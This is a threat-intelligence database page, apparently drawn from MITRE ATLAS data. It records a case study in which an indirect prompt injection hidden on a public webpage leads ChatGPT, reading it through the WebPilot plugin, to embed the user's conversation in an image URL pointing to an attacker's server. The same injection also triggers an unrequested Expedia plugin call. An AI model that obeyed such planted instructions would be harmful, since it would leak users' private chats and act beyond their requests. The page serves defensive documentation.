APromptRiskDBThreat intelligence atlas
AI Case Study

ChatGPT Conversation Exfiltration - AI Case Study

Embrace the Red demonstrated that ChatGPT users' conversations can be exfiltrated via an indirect prompt injection. To execute the attack, a threat actor uploads a malicious prompt to a public website, where a ChatGPT user may interact with it. The prompt causes ChatGPT to respond with the markdown for an image, whose URL has the user's conversation secretly embedded. ChatGPT ren...

ExerciseOpenAI ChatGPTEmbrace The RedResource DevelopmentInitial AccessExecution

Overview

Case steps7Steps described in the case record.
Techniques7Attack methods mentioned in the case steps.
Linked CVEs0Known vulnerabilities mentioned in the record.

Risk patterns

Patterns found in the case record and its linked vulnerabilities.

  • 1Dominant ATLAS tactic. Resource Development appears in 2 case steps.
  • 2Multiple attack methods. The case connects to 7 unique AI attack methods.

Procedure timeline

Search the case steps or filter them by attacker goal.

Resource Development2Initial Access1Execution1Exfiltration1Privilege Escalation1Impact1
  1. Resource Development

    The researcher developed a prompt that causes ChatGPT to include a Markdown element for an image with the user's conversation embedded in the URL as part of its responses.

  2. Initial Access

    When the user makes a query that causes ChatGPT to retrieve the webpage using its WebPilot plugin, it ingests the adversary's prompt.

  3. Step 4

    Indirect

    Execution

    The prompt injection is executed, causing ChatGPT to include a Markdown element for an image hosted on an adversary-controlled server and embed the user's chat history as query parameter in the URL.

  4. Exfiltration

    ChatGPT automatically renders the image for the user, making the request to the adversary's server for the image contents, and exfiltrating the user's conversation.

  5. Privilege Escalation

    Additionally, the prompt can cause the LLM to execute other plugins that do not match a user request. In this instance, the researcher demonstrated the WebPilot plugin making a call to the Expedia plugin.

  6. Step 7

    User Harm

    Impact

    The user's privacy is violated, and they are potentially open to further targeted attacks.

Mitigations

Defenses connected to the attack methods in this case.

Sources

Original public records and references for this case.

Original source

Original source links

Open the MITRE ATLAS data and public references used for this case study.